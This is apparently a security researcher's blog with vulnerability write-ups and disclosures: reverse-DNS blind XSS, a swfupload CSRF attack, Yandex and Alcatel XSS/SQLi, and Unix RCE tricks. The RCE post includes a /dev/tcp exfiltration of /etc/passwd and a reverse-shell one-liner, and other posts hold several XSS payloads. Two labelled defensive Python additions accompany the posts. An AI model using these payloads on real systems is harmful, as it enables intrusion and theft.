Tuesday, 6 May 2014

How Reverse DNS can help us with XSS, SQLi, RCE...

One day I got the idea to put an XSS vector into a reverse DNS record. You know - sometimes a web application displays the IP address AND the reverse lookup. People tend to think that there is no need to sanitize displayed revDNS records, because, as RFC 1034 says:

Note that while upper and lower case letters are allowed in domain
names, no significance is attached to the case.  That is, two names with
the same spelling but different case are to be treated as if identical.

The labels must follow the rules for ARPANET host names.  They must
start with a letter, end with a letter or digit, and have as interior
characters only letters, digits, and hyphen.  There are also some
restrictions on the length.  Labels must be 63 characters or less.

...so (theoretically) there is no possibility of a hostname containing dangerous characters such as > < ' " and it's XSS safe, right?

Right.

c40957:~ jakub.zoczek$ host 87.204.122.210
210.122.204.87.in-addr.arpa is an alias for 210.192/26.122.204.87.in-addr.arpa.
210.192/26.122.204.87.in-addr.arpa domain name pointer f\"><img/src=http://monitor.ropchain.org/xss.gif>f.x.32s.pl.



That's my blind XSS testing IP address. All I need to do is visit websites from this address, and every time it is displayed (and interpreted as HTML) it should load a 1x1 GIF image from my server. In the Apache log I'll have information like IP address, User-Agent and Referer - so I know where the XSS occurred.

To configure this kind of environment you will need:

- at least one IPv4 address
- the possibility to configure a reverse zone on your own DNS server.

So - if you have a VPS with some IP addresses and the possibility to set up reverse DNS - it won't work. In most cases configuration of reverse DNS is implemented in the customer's web panel and restricted to PTR records. If you have the possibility to set up a CNAME or NS record for your revDNS - that's great and it would work. I tried to search for a VPS provider who gives this kind of feature to customers and I didn't find a single one.

Also - as far as I know - ISPs rarely want to give such delegations for only a few addresses, but there is no problem for a full class C or more - then they give, for example, a delegation for the whole /24 prefix. In Poland - Orange can be a solution - there is the possibility to set up CNAME records for a few addresses.

After months of searching for someone who has a full class C, could lend me a few IP addresses and give me a delegation - I finally found a friend of mine who provided me with all I needed.

So - let's say you have the IP address 1.2.3.4 - the reverse zone configuration for BIND will look like this:


The 1.2.3.4 file:

As you can see - there are no big differences from a normal reverse DNS configuration. The most important option is check-names ignore; - it tells BIND that we want to use illegal characters in our DNS records. :)

The problem is that in some languages this IP will be resolved normally (with the payload), and in others - not. At the moment I have checked that it works fine for Linux host, dig, nslookup, Windows nslookup, PHP dns_get_record and Python reversename.from_addr(). In the future I want to check the reverse lookup implementations of all other modern languages.
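The defender's side of this, as an added example that is not part of the original post: a web application that displays reverse lookups should treat the PTR value as untrusted input, check it against the RFC 1034 label rules quoted above, and HTML-escape it anyway. The sample PTR values and IP addresses are constructed for the demo (one of them is the record shown in the post).

```python
import html
import re
from typing import Optional

# RFC 1034 label rules (as quoted above): letters, digits and hyphen only, no
# leading or trailing hyphen, at most 63 characters. A leading digit is also
# accepted here, as RFC 1123 later permitted it.
_LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def is_valid_hostname(name: str) -> bool:
    """True only if every label of `name` obeys the RFC 1034/1123 rules."""
    name = name.rstrip(".")  # resolvers often return a trailing dot
    if not name or len(name) > 253:
        return False
    return all(_LABEL_RE.match(label) for label in name.split("."))


def render_reverse_lookup(ip: str, ptr: Optional[str]) -> str:
    """HTML table cells for an IP and its PTR, treating the PTR as untrusted.

    The PTR comes from a third-party name server that may run with
    check-names disabled, so it is validated first and then HTML-escaped as
    defence in depth.
    """
    if ptr is None or not is_valid_hostname(ptr):
        shown = "(invalid reverse record)"
    else:
        shown = ptr.rstrip(".")
    return f"<td>{html.escape(ip)}</td><td>{html.escape(shown)}</td>"


if __name__ == "__main__":
    # Constructed sample: the PTR value shown in the post and a benign one.
    samples = {
        "87.204.122.210": 'f\\"><img/src=http://monitor.ropchain.org/xss.gif>f.x.32s.pl.',
        "1.2.3.4": "host.example.com.",
    }
    for ip, ptr in samples.items():
        print(render_reverse_lookup(ip, ptr))
```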

Happy hunting, and btw - check my Yandex.Metrica XSS ;-)




Saturday, 1 March 2014

Analysis of swfupload CVE-2013-2205 Security.allowDomain('*') flaw

Intro

Yes - I know it's an old one. Since I have lots of stuff to do, I had only a small amount of time to take a closer look at this vulnerability, found by Szymon Gruszecki and identified as CVE-2013-2205. But I also wanted to understand how to exploit this kind of issue. Since I couldn't find any useful PoCs or examples on the Internet - I decided to learn it and write a post. I believe it will be useful for someone. :)

First, please take a look at the swfupload security fix for this vuln. Yes - it's just one removed line. :)

Security.allowDomain('*')

This will be short - for details please visit the Adobe documentation. Security.allowDomain() is a function which allows a Flash movie to be embedded on, and interacted with from, another domain. For example, we have resource-a.com where swf-a.swf is stored (with Security.allowDomain('resource-b.com')) - we are able to embed swf-a.swf on resource-b.com and interact with all functions that are exposed through the ExternalInterface.addCallback() method.

Depending on the context of the application, it can be used for example to bypass the Same-Origin Policy. How? If swf-a.swf can make HTTP requests to its hosting resource and get a response that can somehow be passed to our JavaScript code... you know what's next ;-)

Analysis

The most interesting functions that we should take a look at are StartUpload(), ReturnUploadStart(), HTTPError_Handler() and UploadSuccess():



UploadSuccess() is called after a successful upload (wow). As we can see, it calls the UploadSuccess callback (which can be set to our own JavaScript function) with serverData as one of the parameters - serverData is the response body from the requested uploadURL.

The attack

OK - so if we are able to get the content of another resource (SOP bypass), we are able to steal CSRF tokens from forms. The attack scenario is simple - zoczus.mooo.com is hosting swfupload from WordPress 3.5.1 on lab.ropchain.org. After the victim (logged into the wp-admin panel) uploads any file, we'll make a request to user-new.php, parse the response for the nonce value, and make a standard CSRF attack to add another admin account. No other interaction (than the file upload) is needed.
I created this proof of concept. Remember to modify wordpress-url to a valid WordPress resource.

Exploit in action:

Thursday, 19 December 2013

Yandex Metrica multiple XSS vulnerabilities

OK, some time ago I found a few XSS vulnerabilities in one of the Yandex services, called Metrika. Most are fixed now, so I can publish the Proofs of Concept. :)

1) Reflected XSS - [somewhere]

(this one is still not fixed, so it will be disclosed in the future, but it's nothing special really)

2) Stored XSS - external links

The demonstration video is quite long because I was creating the PoC while recording. ;-)

http://www.youtube.com/watch?v=ZhNn0uYXpL8

3) Stored XSS - WebVisor

Visiting your website with the Metrica counter in this way:

http://hostname/x.htm?<img/src="XXX"/onerror="alert(1)">ab

causes Metrica WebVisor to render it without escaping, which is just another stored XSS.

4) Stored XSS - file downloads

http://www.youtube.com/watch?v=4xgcjisyzK8

5) Stored XSS - Clickpath analysis

http://www.youtube.com/watch?v=SqTSoCd86Sk

6) Reflected XSS - Form Data analysis

http://www.youtube.com/watch?v=LALvffnT-vQ

7) *BONUS* - out-of-scope (so unrewarded) reflected XSS in yandex.st.

http://yandex.st/mail/neo2/7.35.2005/static/swf/web-socket.swf?onLoad=this.alert('XSS')

Effect + source code:


And that's all for today. :)

Saturday, 14 December 2013

[EN] LiveZilla multiple vulnerabilities

I was looking a bit into the LiveZilla source code and found a few vulnerabilities. Most of them were fixed in 5.1.2.1, released a few days ago. Details:


CVE-2013-7034 - LiveZilla 5.1.2.0 PHP Object Injection
CVE-2013-7033 - LiveZilla 5.1.2.0 Insecure password storage
CVE-2013-7032 - LiveZilla 5.1.2.0 Multiple Stored XSS in web-based operator client
CVE-2013-7003 - LiveZilla 5.1.1.0 Stored XSS in operator clients
CVE-2013-7002 - LiveZilla 5.1.0.0 Reflected XSS in translations


Thursday, 10 October 2013

[EN] Unix RCE without spaces

You have a Remote Code Execution bug - but spaces are removed. How do you pass parameters in this case? And what if we can't see the result of the executed command? Let's do a small trick - redirecting standard input / output.

Here we go:

zoczus@hell:~$ cat</etc/debian_version 
7.1

:) Can't see the output? Send it over the Internet!

[host1]
zoczus@hell:~$ cat</etc/passwd>/dev/tcp/xxxx.pl/5060


[host2]
zoczus@jano:~$ nc -l -p 5060
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
(...)

It looks all right ;) You can also create a reverse shell:

sh</dev/tcp/xxxx.pl/5060>/dev/tcp/xxxx.pl/2222

So now the /bin/sh input (commands) will be taken from xxxx.pl:5060 and the result sent to xxxx.pl:2222.
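From the detection side, as an added example that is not part of the original post: the redirection-only commands above have a recognisable shape in shell history or auditd/EDR command-line records (a command word glued to a redirection, no spaces at all, and /dev/tcp used as a redirection source or target). The sample command lines below are constructed; the hostnames come from the post.

```python
import re
from typing import Dict, List

# Constructed sample command lines, in the form a shell history or an auditd /
# EDR "command line" field would record them. Lines 3-5 mirror the tricks in
# the post; the others are benign.
SAMPLE_COMMANDS = [
    "ls -la /var/www",
    "cat /etc/debian_version",
    "cat</etc/debian_version",
    "cat</etc/passwd>/dev/tcp/xxxx.pl/5060",
    "sh</dev/tcp/xxxx.pl/5060>/dev/tcp/xxxx.pl/2222",
    "curl -s http://updates.example.com/check",
]

# bash's /dev/tcp/HOST/PORT (or /dev/udp) pseudo-file used as a redirection.
_DEV_TCP_RE = re.compile(r"([<>])\s*/dev/(tcp|udp)/([^/\s]+)/(\d{1,5})")
# A command word glued straight onto a redirection operator.
_GLUED_RE = re.compile(r"^[\w./-]+[<>]")


def classify(line: str) -> Dict[str, object]:
    """Explain why one command line is (or is not) suspicious."""
    line = line.strip()
    findings: List[str] = []
    sockets = _DEV_TCP_RE.findall(line)
    for direction, proto, host, port in sockets:
        if direction == "<":
            findings.append(f"stdin read from {proto} {host}:{port}")
        else:
            findings.append(f"stdout sent to {proto} {host}:{port}")
    # No whitespace at all plus a glued redirection: the space-stripping
    # filter bypass described in the post.
    if " " not in line and _GLUED_RE.match(line):
        findings.append("redirection used in place of arguments (no spaces)")
    # Both standard streams bound to network endpoints is the shape of the
    # redirection-only reverse shell.
    if {d for d, *_ in sockets} == {"<", ">"}:
        findings.append("stdin and stdout both bound to network sockets")
    return {"command": line, "suspicious": bool(findings), "findings": findings}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return the classification of every suspicious line in `lines`."""
    return [r for r in (classify(l) for l in lines) if r["suspicious"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMANDS):
        print(hit["command"], "->", "; ".join(hit["findings"]))
```

The glued-redirection rule alone will flag some legitimate one-liners, so in practice weight it lower than the /dev/tcp rules and review it with the parent process in mind.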

I hope this one was useful ;)

Friday, 27 September 2013

[EN] Alcatel OneTouch Website - XSS & SQL Injection

SO - the first thing is that both bugs are really obvious... I can't believe they existed for so long on the official Alcatel One Touch website.

How to reproduce the bug:
1) Go to the http://alcatelonetouch.com website
2) Search for bad'syntax or f<script>alert(1);</script>
3) Get an alert or a PHP error (depending on whether you're trying to exploit the XSS or the SQLi).

XSS:



SQLi:



I think this case is so basic that it doesn't need to be explained.

OK - now the funny part - the timeline.

05/02/2013 - discovered the bug
06/02/2013 - contacted using the e-mail provided in the WHOIS database
13/02/2013 - no response, contacted USSupport@tcl.com
11/03/2013 - mailed the Polish Alcatel-Lucent department with a request for some contact info for my case
11/03/2013 - response from Alcatel-Lucent - forwarded me to TCL Communication
12/03/2013 - mail sent using the official TCL contact form
13/03/2013 - after googlin' - found an employee working for TCL and their contact info - sent mail.
29/04/2013 - no response - tried to contact using info.america@tcl.com
12/06/2013 - still no response, tried to contact some sales managers found on the Alcatel website
28/06/2013 - Tweeted @ALCATELONETOUCH about the vuln and requested contact information
02/07/2013 - no response - another tweet.
04/07/2013 - still no response - another tweet
08/07/2013 - ...and another ;)
09/07/2013 - everybody please, sit down - I've got the first Alcatel response. It tells me that I should contact them using their official Facebook.
09/07/2013 - Contacted using Facebook.
10/07/2013 - Response confirming that the information that I found some issue in their website was sent to their "team".
10/07/2013 - The problem was that I hadn't provided any details about the vulnerability, not even what kind of issue it is ;) I asked if they needed any details.
11/07/2013 - I sent a really detailed advisory about the vulnerability I found.
16/07/2013 - got a response confirming that my details were shared with their tech team.
24/07/2013 - tried to get some other info - no response
07/08/2013 - ping -> no response.
27/09/2013 - not fixed -> Public Disclosure

Feel free to comment. :)

-- UPDATE --
On 12/11/2013 one of the TCL IT Managers responsible for the AlcatelOneTouch.com website contacted me. We cooperated to fix these issues and from now on it's OK. :)

Thursday, 29 August 2013

Yandex Bug Bounty - Multiple Vulnerabilities

A few weeks ago I reported a few bugs as part of the Yandex Bug Bounty Program. Check it out:

1) Cross-Site Flashing  - wordstat.yandex.com

A bug in ammap.swf that allows us to use configuration files from external resources, modify the Flash content and of course - abuse it. :)

This resource has been removed now, but here is the payload URL I used:

http://wordstat.yandex.com/flash/ammap/ammap.swf?settings_file=http://myhost/yandex.xml&data_file=http://myhost/evil_data.xml

Configuration files: yandex.xml and evil_data.xml

First - check the context menu and the new option - 'Download users database from this region' ;)


After clicking - our "database" is prepared for download - the information is at the bottom of the page.


When the progress reaches 100% - our payload is executed.


2) Stored XSS - Yandex Maps

I provided a short PoC video:



3) Mixed-content - Yandex Video

This one wasn't rewarded and in fact - all modern browsers block mixed content at the moment (also Firefox). The demonstration video is just for educational purposes and fun ;-)